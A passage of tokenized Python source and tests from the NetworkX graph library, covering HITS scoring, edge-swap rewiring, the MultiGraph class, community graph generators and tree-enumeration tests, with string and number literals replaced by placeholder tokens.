<s> """<STR_LIT>""" <EOL> import networkx as nx <EOL> from networkx . exception import NetworkXError <EOL> __author__ = """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def hits ( G , max_iter = <NUM_LIT:100> , tol = <NUM_LIT> , nstart = None , normalized = True ) : <EOL> """<STR_LIT>""" <EOL> if type ( G ) == nx . MultiGraph or type ( G ) == nx . MultiDiGraph : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if len ( G ) == <NUM_LIT:0> : <EOL> return { } , { } <EOL> if nstart is None : <EOL> h = dict . fromkeys ( G , <NUM_LIT:1.0> / G . number_of_nodes ( ) ) <EOL> else : <EOL> h = nstart <EOL> s = <NUM_LIT:1.0> / sum ( h . values ( ) ) <EOL> for k in h : <EOL> h [ k ] *= s <EOL> i = <NUM_LIT:0> <EOL> while True : <EOL> hlast = h <EOL> h = dict . fromkeys ( hlast . keys ( ) , <NUM_LIT:0> ) <EOL> a = dict . fromkeys ( hlast . keys ( ) , <NUM_LIT:0> ) <EOL> for n in h : <EOL> for nbr in G [ n ] : <EOL> a [ nbr ] += hlast [ n ] * G [ n ] [ nbr ] . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> for n in h : <EOL> for nbr in G [ n ] : <EOL> h [ n ] += a [ nbr ] * G [ n ] [ nbr ] . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> s = <NUM_LIT:1.0> / max ( h . values ( ) ) <EOL> for n in h : h [ n ] *= s <EOL> s = <NUM_LIT:1.0> / max ( a . values ( ) ) <EOL> for n in a : a [ n ] *= s <EOL> err = sum ( [ abs ( h [ n ] - hlast [ n ] ) for n in h ] ) <EOL> if err < tol : <EOL> break <EOL> if i > max_iter : <EOL> raise NetworkXError ( "<STR_LIT>" % ( i + <NUM_LIT:1> ) ) <EOL> i += <NUM_LIT:1> <EOL> if normalized : <EOL> s = <NUM_LIT:1.0> / sum ( a . values ( ) ) <EOL> for n in a : <EOL> a [ n ] *= s <EOL> s = <NUM_LIT:1.0> / sum ( h . values ( ) ) <EOL> for n in h : <EOL> h [ n ] *= s <EOL> return h , a <EOL> def authority_matrix ( G , nodelist = None ) : <EOL> """<STR_LIT>""" <EOL> M = nx . to_numpy_matrix ( G , nodelist = nodelist ) <EOL> return M . T * M <EOL> def hub_matrix ( G , nodelist = None ) : <EOL> """<STR_LIT>""" <EOL> M = nx . to_numpy_matrix ( G , nodelist = nodelist ) <EOL> return M * M . T <EOL> def hits_numpy ( G , normalized = True ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> import numpy as np <EOL> except ImportError : <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> if len ( G ) == <NUM_LIT:0> : <EOL> return { } , { } <EOL> H = nx . hub_matrix ( G , list ( G ) ) <EOL> e , ev = np . linalg . eig ( H ) <EOL> m = e . argsort ( ) [ - <NUM_LIT:1> ] <EOL> h = np . array ( ev [ : , m ] ) . flatten ( ) <EOL> A = nx . authority_matrix ( G , list ( G ) ) <EOL> e , ev = np . linalg . eig ( A ) <EOL> m = e . argsort ( ) [ - <NUM_LIT:1> ] <EOL> a = np . array ( ev [ : , m ] ) . flatten ( ) <EOL> if normalized : <EOL> h = h / h . sum ( ) <EOL> a = a / a . sum ( ) <EOL> else : <EOL> h = h / h . max ( ) <EOL> a = a / a . max ( ) <EOL> hubs = dict ( zip ( G , map ( float , h ) ) ) <EOL> authorities = dict ( zip ( G , map ( float , a ) ) ) <EOL> return hubs , authorities <EOL> def hits_scipy ( G , max_iter = <NUM_LIT:100> , tol = <NUM_LIT> , normalized = True ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> import scipy . sparse <EOL> import numpy as np <EOL> except ImportError : <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> if len ( G ) == <NUM_LIT:0> : <EOL> return { } , { } <EOL> M = nx . to_scipy_sparse_matrix ( G , nodelist = list ( G ) ) <EOL> ( n , m ) = M . shape <EOL> A = M . T * M <EOL> x = scipy . ones ( ( n , <NUM_LIT:1> ) ) / n <EOL> i = <NUM_LIT:0> <EOL> while True : <EOL> xlast = x <EOL> x = A * x <EOL> x = x / x . max ( ) <EOL> err = scipy . absolute ( x - xlast ) . sum ( ) <EOL> if err < tol : <EOL> break <EOL> if i > max_iter : <EOL> raise NetworkXError ( "<STR_LIT>" % ( i + <NUM_LIT:1> ) ) <EOL> i += <NUM_LIT:1> <EOL> a = np . asarray ( x ) . flatten ( ) <EOL> h = np . asarray ( M * a ) . flatten ( ) <EOL> if normalized : <EOL> h = h / h . sum ( ) <EOL> a = a / a . sum ( ) <EOL> hubs = dict ( zip ( G , map ( float , h ) ) ) <EOL> authorities = dict ( zip ( G , map ( float , a ) ) ) <EOL> return hubs , authorities <EOL> def setup_module ( module ) : <EOL> from nose import SkipTest <EOL> try : <EOL> import numpy <EOL> except : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> try : <EOL> import scipy <EOL> except : <EOL> raise SkipTest ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import math <EOL> import random <EOL> import networkx as nx <EOL> __author__ = "<STR_LIT:\n>" . join ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> __all__ = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> def double_edge_swap ( G , nswap = <NUM_LIT:1> , max_tries = <NUM_LIT:100> ) : <EOL> """<STR_LIT>""" <EOL> if G . is_directed ( ) : <EOL> raise nx . NetworkXError ( "<STR_LIT>" ) <EOL> if nswap > max_tries : <EOL> raise nx . NetworkXError ( "<STR_LIT>" ) <EOL> if len ( G ) < <NUM_LIT:4> : <EOL> raise nx . NetworkXError ( "<STR_LIT>" ) <EOL> n = <NUM_LIT:0> <EOL> swapcount = <NUM_LIT:0> <EOL> keys , degrees = zip ( * G . degree ( ) ) <EOL> cdf = nx . utils . cumulative_distribution ( degrees ) <EOL> while swapcount < nswap : <EOL> ( ui , xi ) = nx . utils . discrete_sequence ( <NUM_LIT:2> , cdistribution = cdf ) <EOL> if ui == xi : <EOL> continue <EOL> u = keys [ ui ] <EOL> x = keys [ xi ] <EOL> v = random . choice ( list ( G [ u ] ) ) <EOL> y = random . choice ( list ( G [ x ] ) ) <EOL> if v == y : <EOL> continue <EOL> if ( x not in G [ u ] ) and ( y not in G [ v ] ) : <EOL> G . add_edge ( u , x ) <EOL> G . add_edge ( v , y ) <EOL> G . remove_edge ( u , v ) <EOL> G . remove_edge ( x , y ) <EOL> swapcount += <NUM_LIT:1> <EOL> if n >= max_tries : <EOL> e = ( '<STR_LIT>' % n + <EOL> '<STR_LIT>' % nswap ) <EOL> raise nx . NetworkXAlgorithmError ( e ) <EOL> n += <NUM_LIT:1> <EOL> return G <EOL> def connected_double_edge_swap ( G , nswap = <NUM_LIT:1> , _window_threshold = <NUM_LIT:3> ) : <EOL> """<STR_LIT>""" <EOL> if not nx . is_connected ( G ) : <EOL> raise nx . NetworkXError ( "<STR_LIT>" ) <EOL> if len ( G ) < <NUM_LIT:4> : <EOL> raise nx . NetworkXError ( "<STR_LIT>" ) <EOL> n = <NUM_LIT:0> <EOL> swapcount = <NUM_LIT:0> <EOL> deg = G . degree ( ) <EOL> dk = list ( n for n , d in G . degree ( ) ) <EOL> cdf = nx . utils . cumulative_distribution ( list ( d for n , d in G . degree ( ) ) ) <EOL> window = <NUM_LIT:1> <EOL> while n < nswap : <EOL> wcount = <NUM_LIT:0> <EOL> swapped = [ ] <EOL> if window < _window_threshold : <EOL> fail = False <EOL> while wcount < window and n < nswap : <EOL> ( ui , xi ) = nx . utils . discrete_sequence ( <NUM_LIT:2> , cdistribution = cdf ) <EOL> if ui == xi : <EOL> continue <EOL> u = dk [ ui ] <EOL> x = dk [ xi ] <EOL> v = random . choice ( list ( G . neighbors ( u ) ) ) <EOL> y = random . choice ( list ( G . neighbors ( x ) ) ) <EOL> if v == y : <EOL> continue <EOL> if x not in G [ u ] and y not in G [ v ] : <EOL> G . remove_edge ( u , v ) <EOL> G . remove_edge ( x , y ) <EOL> G . add_edge ( u , x ) <EOL> G . add_edge ( v , y ) <EOL> swapped . append ( ( u , v , x , y ) ) <EOL> swapcount += <NUM_LIT:1> <EOL> n += <NUM_LIT:1> <EOL> if nx . has_path ( G , u , v ) : <EOL> wcount += <NUM_LIT:1> <EOL> else : <EOL> G . add_edge ( u , v ) <EOL> G . add_edge ( x , y ) <EOL> G . remove_edge ( u , x ) <EOL> G . remove_edge ( v , y ) <EOL> swapcount -= <NUM_LIT:1> <EOL> fail = True <EOL> if fail : <EOL> window = int ( math . ceil ( window / <NUM_LIT:2> ) ) <EOL> else : <EOL> window += <NUM_LIT:1> <EOL> else : <EOL> while wcount < window and n < nswap : <EOL> ( ui , xi ) = nx . utils . discrete_sequence ( <NUM_LIT:2> , cdistribution = cdf ) <EOL> if ui == xi : <EOL> continue <EOL> u = dk [ ui ] <EOL> x = dk [ xi ] <EOL> v = random . choice ( list ( G . neighbors ( u ) ) ) <EOL> y = random . choice ( list ( G . neighbors ( x ) ) ) <EOL> if v == y : <EOL> continue <EOL> if x not in G [ u ] and y not in G [ v ] : <EOL> G . remove_edge ( u , v ) <EOL> G . remove_edge ( x , y ) <EOL> G . add_edge ( u , x ) <EOL> G . add_edge ( v , y ) <EOL> swapped . append ( ( u , v , x , y ) ) <EOL> swapcount += <NUM_LIT:1> <EOL> n += <NUM_LIT:1> <EOL> wcount += <NUM_LIT:1> <EOL> if nx . is_connected ( G ) : <EOL> window += <NUM_LIT:1> <EOL> else : <EOL> while swapped : <EOL> ( u , v , x , y ) = swapped . pop ( ) <EOL> G . add_edge ( u , v ) <EOL> G . add_edge ( x , y ) <EOL> G . remove_edge ( u , x ) <EOL> G . remove_edge ( v , y ) <EOL> swapcount -= <NUM_LIT:1> <EOL> window = int ( math . ceil ( window / <NUM_LIT:2> ) ) <EOL> return swapcount </s>
<s> """<STR_LIT>""" <EOL> from nose . tools import assert_equal <EOL> import networkx as nx <EOL> def test_triadic_census ( ) : <EOL> """<STR_LIT>""" <EOL> G = nx . DiGraph ( ) <EOL> G . add_edges_from ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> expected = { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:9> , '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:9> , '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:2> } <EOL> actual = nx . triadic_census ( G ) <EOL> assert_equal ( expected , actual ) </s>
<s> """<STR_LIT>""" <EOL> from copy import deepcopy <EOL> import networkx as nx <EOL> from networkx . classes . graph import Graph <EOL> from networkx import NetworkXError <EOL> __author__ = """<STR_LIT:\n>""" . join ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> class MultiGraph ( Graph ) : <EOL> """<STR_LIT>""" <EOL> edge_key_dict_factory = dict <EOL> def __init__ ( self , data = None , ** attr ) : <EOL> self . edge_key_dict_factory = self . edge_key_dict_factory <EOL> Graph . __init__ ( self , data , ** attr ) <EOL> def add_edge ( self , u , v , key = None , attr_dict = None , ** attr ) : <EOL> """<STR_LIT>""" <EOL> if attr_dict is None : <EOL> attr_dict = attr <EOL> else : <EOL> try : <EOL> attr_dict . update ( attr ) <EOL> except AttributeError : <EOL> raise NetworkXError ( <EOL> "<STR_LIT>" ) <EOL> if u not in self . adj : <EOL> self . adj [ u ] = self . adjlist_dict_factory ( ) <EOL> self . node [ u ] = { } <EOL> if v not in self . adj : <EOL> self . adj [ v ] = self . adjlist_dict_factory ( ) <EOL> self . node [ v ] = { } <EOL> if v in self . adj [ u ] : <EOL> keydict = self . adj [ u ] [ v ] <EOL> if key is None : <EOL> key = len ( keydict ) <EOL> while key in keydict : <EOL> key += <NUM_LIT:1> <EOL> datadict = keydict . get ( key , self . edge_attr_dict_factory ( ) ) <EOL> datadict . update ( attr_dict ) <EOL> keydict [ key ] = datadict <EOL> else : <EOL> if key is None : <EOL> key = <NUM_LIT:0> <EOL> datadict = self . edge_attr_dict_factory ( ) <EOL> datadict . update ( attr_dict ) <EOL> keydict = self . edge_key_dict_factory ( ) <EOL> keydict [ key ] = datadict <EOL> self . adj [ u ] [ v ] = keydict <EOL> self . adj [ v ] [ u ] = keydict <EOL> def add_edges_from ( self , ebunch , attr_dict = None , ** attr ) : <EOL> """<STR_LIT>""" <EOL> if attr_dict is None : <EOL> attr_dict = attr <EOL> else : <EOL> try : <EOL> attr_dict . update ( attr ) <EOL> except AttributeError : <EOL> raise NetworkXError ( <EOL> "<STR_LIT>" ) <EOL> for e in ebunch : <EOL> ne = len ( e ) <EOL> if ne == <NUM_LIT:4> : <EOL> u , v , key , dd = e <EOL> elif ne == <NUM_LIT:3> : <EOL> u , v , dd = e <EOL> key = None <EOL> elif ne == <NUM_LIT:2> : <EOL> u , v = e <EOL> dd = { } <EOL> key = None <EOL> else : <EOL> raise NetworkXError ( <EOL> "<STR_LIT>" % ( e , ) ) <EOL> ddd = { } <EOL> ddd . update ( attr_dict ) <EOL> ddd . update ( dd ) <EOL> self . add_edge ( u , v , key , ddd ) <EOL> def remove_edge ( self , u , v , key = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> d = self . adj [ u ] [ v ] <EOL> except ( KeyError ) : <EOL> raise NetworkXError ( <EOL> "<STR_LIT>" % ( u , v ) ) <EOL> if key is None : <EOL> d . popitem ( ) <EOL> else : <EOL> try : <EOL> del d [ key ] <EOL> except ( KeyError ) : <EOL> raise NetworkXError ( <EOL> "<STR_LIT>" % ( <EOL> u , v , key ) ) <EOL> if len ( d ) == <NUM_LIT:0> : <EOL> del self . adj [ u ] [ v ] <EOL> if u != v : <EOL> del self . adj [ v ] [ u ] <EOL> def remove_edges_from ( self , ebunch ) : <EOL> """<STR_LIT>""" <EOL> for e in ebunch : <EOL> try : <EOL> self . remove_edge ( * e [ : <NUM_LIT:3> ] ) <EOL> except NetworkXError : <EOL> pass <EOL> def has_edge ( self , u , v , key = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if key is None : <EOL> return v in self . adj [ u ] <EOL> else : <EOL> return key in self . adj [ u ] [ v ] <EOL> except KeyError : <EOL> return False <EOL> def edges ( self , nbunch = None , data = False , keys = False , default = None ) : <EOL> """<STR_LIT>""" <EOL> seen = { } <EOL> if nbunch is None : <EOL> nodes_nbrs = self . adj . items ( ) <EOL> else : <EOL> nodes_nbrs = ( ( n , self . adj [ n ] ) for n in self . nbunch_iter ( nbunch ) ) <EOL> if data is True : <EOL> for n , nbrs in nodes_nbrs : <EOL> for nbr , keydict in nbrs . items ( ) : <EOL> if nbr not in seen : <EOL> for key , ddict in keydict . items ( ) : <EOL> yield ( n , nbr , key , ddict ) if keys else ( n , nbr , ddict ) <EOL> seen [ n ] = <NUM_LIT:1> <EOL> elif data is not False : <EOL> for n , nbrs in nodes_nbrs : <EOL> for nbr , keydict in nbrs . items ( ) : <EOL> if nbr not in seen : <EOL> for key , ddict in keydict . items ( ) : <EOL> d = ddict [ data ] if data in ddict else default <EOL> yield ( n , nbr , key , d ) if keys else ( n , nbr , d ) <EOL> seen [ n ] = <NUM_LIT:1> <EOL> else : <EOL> for n , nbrs in nodes_nbrs : <EOL> for nbr , keydict in nbrs . items ( ) : <EOL> if nbr not in seen : <EOL> for key in keydict : <EOL> yield ( n , nbr , key ) if keys else ( n , nbr ) <EOL> seen [ n ] = <NUM_LIT:1> <EOL> del seen <EOL> def get_edge_data ( self , u , v , key = None , default = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if key is None : <EOL> return self . adj [ u ] [ v ] <EOL> else : <EOL> return self . adj [ u ] [ v ] [ key ] <EOL> except KeyError : <EOL> return default <EOL> def degree ( self , nbunch = None , weight = None ) : <EOL> """<STR_LIT>""" <EOL> if nbunch in self : <EOL> nbrs = self . adj [ nbunch ] <EOL> if weight is None : <EOL> return sum ( [ len ( data ) for data in nbrs . values ( ) ] ) + ( nbunch in nbrs and len ( nbrs [ nbunch ] ) ) <EOL> deg = sum ( [ d . get ( weight , <NUM_LIT:1> ) for data in nbrs . values ( ) for d in data . values ( ) ] ) <EOL> if nbunch in nbrs : <EOL> deg += sum ( [ d . get ( weight , <NUM_LIT:1> ) for key , d in nbrs [ nbunch ] . items ( ) ] ) <EOL> return deg <EOL> if nbunch is None : <EOL> nodes_nbrs = self . adj . items ( ) <EOL> else : <EOL> nodes_nbrs = ( ( n , self . adj [ n ] ) for n in self . nbunch_iter ( nbunch ) ) <EOL> if weight is None : <EOL> def d_iter ( ) : <EOL> for n , nbrs in nodes_nbrs : <EOL> deg = sum ( [ len ( data ) for data in nbrs . values ( ) ] ) <EOL> yield ( n , deg + ( n in nbrs and len ( nbrs [ n ] ) ) ) <EOL> else : <EOL> def d_iter ( ) : <EOL> for n , nbrs in nodes_nbrs : <EOL> deg = sum ( [ d . get ( weight , <NUM_LIT:1> ) <EOL> for data in nbrs . values ( ) <EOL> for d in data . values ( ) ] ) <EOL> if n in nbrs : <EOL> deg += sum ( [ d . get ( weight , <NUM_LIT:1> ) <EOL> for key , d in nbrs [ n ] . items ( ) ] ) <EOL> yield ( n , deg ) <EOL> return d_iter ( ) <EOL> def is_multigraph ( self ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> def is_directed ( self ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def to_directed ( self ) : <EOL> """<STR_LIT>""" <EOL> from networkx . classes . multidigraph import MultiDiGraph <EOL> G = MultiDiGraph ( ) <EOL> G . add_nodes_from ( self ) <EOL> G . add_edges_from ( ( u , v , key , deepcopy ( datadict ) ) <EOL> for u , nbrs in self . adjacency ( ) <EOL> for v , keydict in nbrs . items ( ) <EOL> for key , datadict in keydict . items ( ) ) <EOL> G . graph = deepcopy ( self . graph ) <EOL> G . node = deepcopy ( self . node ) <EOL> return G <EOL> def selfloop_edges ( self , data = False , keys = False , default = None ) : <EOL> """<STR_LIT>""" <EOL> if data is True : <EOL> if keys : <EOL> return ( ( n , n , k , d ) <EOL> for n , nbrs in self . adj . items ( ) <EOL> if n in nbrs for k , d in nbrs [ n ] . items ( ) ) <EOL> else : <EOL> return ( ( n , n , d ) <EOL> for n , nbrs in self . adj . items ( ) <EOL> if n in nbrs for d in nbrs [ n ] . values ( ) ) <EOL> elif data is not False : <EOL> if keys : <EOL> return ( ( n , n , k , d . get ( data , default ) ) <EOL> for n , nbrs in self . adj . items ( ) <EOL> if n in nbrs for k , d in nbrs [ n ] . items ( ) ) <EOL> else : <EOL> return ( ( n , n , d . get ( data , default ) ) <EOL> for n , nbrs in self . adj . items ( ) <EOL> if n in nbrs for d in nbrs [ n ] . values ( ) ) <EOL> else : <EOL> if keys : <EOL> return ( ( n , n , k ) <EOL> for n , nbrs in self . adj . items ( ) <EOL> if n in nbrs for k in nbrs [ n ] . keys ( ) ) <EOL> else : <EOL> return ( ( n , n ) <EOL> for n , nbrs in self . adj . items ( ) <EOL> if n in nbrs for d in nbrs [ n ] . values ( ) ) <EOL> def number_of_edges ( self , u = None , v = None ) : <EOL> """<STR_LIT>""" <EOL> if u is None : return self . size ( ) <EOL> try : <EOL> edgedata = self . adj [ u ] [ v ] <EOL> except KeyError : <EOL> return <NUM_LIT:0> <EOL> return len ( edgedata ) <EOL> def subgraph ( self , nbunch ) : <EOL> """<STR_LIT>""" <EOL> bunch = self . nbunch_iter ( nbunch ) <EOL> H = self . __class__ ( ) <EOL> for n in bunch : <EOL> H . node [ n ] = self . node [ n ] <EOL> H_adj = H . adj <EOL> self_adj = self . adj <EOL> for n in H : <EOL> Hnbrs = H . adjlist_dict_factory ( ) <EOL> H_adj [ n ] = Hnbrs <EOL> for nbr , edgedict in self_adj [ n ] . items ( ) : <EOL> if nbr in H_adj : <EOL> ed = edgedict . copy ( ) <EOL> Hnbrs [ nbr ] = ed <EOL> H_adj [ nbr ] [ n ] = ed <EOL> H . graph = self . graph <EOL> return H <EOL> def edge_subgraph ( self , edges ) : <EOL> """<STR_LIT>""" <EOL> H = self . __class__ ( ) <EOL> adj = self . adj <EOL> def is_in_graph ( u , v , k ) : <EOL> return u in adj and v in adj [ u ] and k in adj [ u ] [ v ] <EOL> edges = ( e for e in edges if is_in_graph ( * e ) ) <EOL> for u , v , k in edges : <EOL> if u not in H . node : <EOL> H . node [ u ] = self . node [ u ] <EOL> if v not in H . node : <EOL> H . node [ v ] = self . node [ v ] <EOL> if u not in H . adj : <EOL> H . adj [ u ] = H . adjlist_dict_factory ( ) <EOL> if v not in H . adj : <EOL> H . adj [ v ] = H . adjlist_dict_factory ( ) <EOL> if v not in H . adj [ u ] : <EOL> H . adj [ u ] [ v ] = H . edge_key_dict_factory ( ) <EOL> if u not in H . adj [ v ] : <EOL> H . adj [ v ] [ u ] = H . edge_key_dict_factory ( ) <EOL> H . edge [ u ] [ v ] [ k ] = self . edge [ u ] [ v ] [ k ] <EOL> H . edge [ v ] [ u ] [ k ] = self . edge [ v ] [ u ] [ k ] <EOL> H . graph = self . graph <EOL> return H </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> import math <EOL> import random <EOL> import networkx as nx <EOL> __author__ = """<STR_LIT:\n>""" . join ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> def caveman_graph ( l , k ) : <EOL> """<STR_LIT>""" <EOL> G = nx . empty_graph ( l * k ) <EOL> G . name = "<STR_LIT>" % ( l * k , k ) <EOL> if k > <NUM_LIT:1> : <EOL> for start in range ( <NUM_LIT:0> , l * k , k ) : <EOL> edges = itertools . combinations ( range ( start , start + k ) , <NUM_LIT:2> ) <EOL> G . add_edges_from ( edges ) <EOL> return G <EOL> def connected_caveman_graph ( l , k ) : <EOL> """<STR_LIT>""" <EOL> G = nx . caveman_graph ( l , k ) <EOL> G . name = "<STR_LIT>" % ( l , k ) <EOL> for start in range ( <NUM_LIT:0> , l * k , k ) : <EOL> G . remove_edge ( start , start + <NUM_LIT:1> ) <EOL> G . add_edge ( start , ( start - <NUM_LIT:1> ) % ( l * k ) ) <EOL> return G <EOL> def relaxed_caveman_graph ( l , k , p , seed = None ) : <EOL> """<STR_LIT>""" <EOL> if not seed is None : <EOL> random . seed ( seed ) <EOL> G = nx . caveman_graph ( l , k ) <EOL> nodes = list ( G ) <EOL> G . name = "<STR_LIT>" % ( l , k , p ) <EOL> for ( u , v ) in G . edges ( ) : <EOL> if random . random ( ) < p : <EOL> x = random . choice ( nodes ) <EOL> if G . has_edge ( u , x ) : <EOL> continue <EOL> G . remove_edge ( u , v ) <EOL> G . add_edge ( u , x ) <EOL> return G <EOL> def random_partition_graph ( sizes , p_in , p_out , seed = None , directed = False ) : <EOL> """<STR_LIT>""" <EOL> if not seed is None : <EOL> random . seed ( seed ) <EOL> if not <NUM_LIT:0.0> <= p_in <= <NUM_LIT:1.0> : <EOL> raise nx . NetworkXError ( "<STR_LIT>" ) <EOL> if not <NUM_LIT:0.0> <= p_out <= <NUM_LIT:1.0> : <EOL> raise nx . NetworkXError ( "<STR_LIT>" ) <EOL> if directed : <EOL> G = nx . DiGraph ( ) <EOL> else : <EOL> G = nx . Graph ( ) <EOL> G . graph [ '<STR_LIT>' ] = [ ] <EOL> n = sum ( sizes ) <EOL> G . add_nodes_from ( range ( n ) ) <EOL> next_group = { } <EOL> start = <NUM_LIT:0> <EOL> group = <NUM_LIT:0> <EOL> for n in sizes : <EOL> edges = ( ( u + start , v + start ) <EOL> for u , v in <EOL> nx . fast_gnp_random_graph ( n , p_in , directed = directed ) . edges ( ) ) <EOL> G . add_edges_from ( edges ) <EOL> next_group . update ( dict . fromkeys ( range ( start , start + n ) , start + n ) ) <EOL> G . graph [ '<STR_LIT>' ] . append ( set ( range ( start , start + n ) ) ) <EOL> group += <NUM_LIT:1> <EOL> start += n <EOL> if p_out == <NUM_LIT:0> : <EOL> return G <EOL> if p_out == <NUM_LIT:1> : <EOL> for n in next_group : <EOL> targets = range ( next_group [ n ] , len ( G ) ) <EOL> G . add_edges_from ( zip ( [ n ] * len ( targets ) , targets ) ) <EOL> if directed : <EOL> G . add_edges_from ( zip ( targets , [ n ] * len ( targets ) ) ) <EOL> return G <EOL> lp = math . log ( <NUM_LIT:1.0> - p_out ) <EOL> n = len ( G ) <EOL> if directed : <EOL> for u in range ( n ) : <EOL> v = <NUM_LIT:0> <EOL> while v < n : <EOL> lr = math . log ( <NUM_LIT:1.0> - random . random ( ) ) <EOL> v += int ( lr / lp ) <EOL> if next_group . get ( v , n ) == next_group [ u ] : <EOL> v = next_group [ u ] <EOL> if v < n : <EOL> G . add_edge ( u , v ) <EOL> v += <NUM_LIT:1> <EOL> else : <EOL> for u in range ( n - <NUM_LIT:1> ) : <EOL> v = next_group [ u ] <EOL> while v < n : <EOL> lr = math . log ( <NUM_LIT:1.0> - random . random ( ) ) <EOL> v += int ( lr / lp ) <EOL> if v < n : <EOL> G . add_edge ( u , v ) <EOL> v += <NUM_LIT:1> <EOL> return G <EOL> def planted_partition_graph ( l , k , p_in , p_out , seed = None , directed = False ) : <EOL> """<STR_LIT>""" <EOL> return random_partition_graph ( [ k ] * l , p_in , p_out , seed , directed ) <EOL> def gaussian_random_partition_graph ( n , s , v , p_in , p_out , directed = False , <EOL> seed = None ) : <EOL> """<STR_LIT>""" <EOL> if s > n : <EOL> raise nx . NetworkXError ( "<STR_LIT>" ) <EOL> assigned = <NUM_LIT:0> <EOL> sizes = [ ] <EOL> while True : <EOL> size = int ( random . normalvariate ( s , float ( s ) / v + <NUM_LIT:0.5> ) ) <EOL> if size < <NUM_LIT:1> : <EOL> continue <EOL> if assigned + size >= n : <EOL> sizes . append ( n - assigned ) <EOL> break <EOL> assigned += size <EOL> sizes . append ( size ) <EOL> return random_partition_graph ( sizes , p_in , p_out , directed , seed ) <EOL> def ring_of_cliques ( num_cliques , clique_size ) : <EOL> """<STR_LIT>""" <EOL> if num_cliques < <NUM_LIT:2> : <EOL> raise nx . NetworkXError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if clique_size < <NUM_LIT:2> : <EOL> raise nx . NetworkXError ( '<STR_LIT>' ) <EOL> G = nx . Graph ( ) <EOL> for i in range ( num_cliques ) : <EOL> edges = itertools . combinations ( range ( i * clique_size , i * clique_size + <EOL> clique_size ) , <NUM_LIT:2> ) <EOL> G . add_edges_from ( edges ) <EOL> G . add_edge ( i * clique_size + <NUM_LIT:1> , ( i + <NUM_LIT:1> ) * clique_size % <EOL> ( num_cliques * clique_size ) ) <EOL> return G </s>
<s> """<STR_LIT>""" <EOL> from nose . tools import * <EOL> from networkx import * <EOL> class TestGeneratorNonIsomorphicTrees ( ) : <EOL> def test_tree_structure ( self ) : <EOL> f = lambda x : list ( nx . nonisomorphic_trees ( x ) ) <EOL> for i in f ( <NUM_LIT:6> ) : <EOL> assert_true ( nx . is_tree ( i ) ) <EOL> for i in f ( <NUM_LIT:8> ) : <EOL> assert_true ( nx . is_tree ( i ) ) <EOL> def test_nonisomorphism ( self ) : <EOL> f = lambda x : list ( nx . nonisomorphic_trees ( x ) ) <EOL> trees = f ( <NUM_LIT:6> ) <EOL> for i in range ( len ( trees ) ) : <EOL> for j in range ( i + <NUM_LIT:1> , len ( trees ) ) : <EOL> assert_false ( nx . is_isomorphic ( trees [ i ] , trees [ j ] ) ) <EOL> trees = f ( <NUM_LIT:8> ) <EOL> for i in range ( len ( trees ) ) : <EOL> for j in range ( i + <NUM_LIT:1> , len ( trees ) ) : <EOL> assert_false ( nx . is_isomorphic ( trees [ i ] , trees [ j ] ) ) <EOL> def test_number_of_nonisomorphic_trees ( self ) : <EOL> assert_equal ( nx . number_of_nonisomorphic_trees ( <NUM_LIT:2> ) , <NUM_LIT:1> ) <EOL> assert_equal ( nx . number_of_nonisomorphic_trees ( <NUM_LIT:3> ) , <NUM_LIT:1> ) <EOL> assert_equal ( nx . number_of_nonisomorphic_trees ( <NUM_LIT:4> ) , <NUM_LIT:2> ) <EOL> assert_equal ( nx . number_of_nonisomorphic_trees ( <NUM_LIT:5> ) , <NUM_LIT:3> ) <EOL> assert_equal ( nx . number_of_nonisomorphic_trees ( <NUM_LIT:6> ) , <NUM_LIT:6> ) <EOL> assert_equal ( nx . number_of_nonisomorphic_trees ( <NUM_LIT:7> ) , <NUM_LIT:11> ) <EOL> assert_equal ( nx . number_of_nonisomorphic_trees ( <NUM_LIT:8> ) , <NUM_LIT> ) <EOL> def test_nonisomorphic_trees ( self ) : <EOL> f = lambda x : list ( nx . nonisomorphic_trees ( x ) ) <EOL> assert_equal 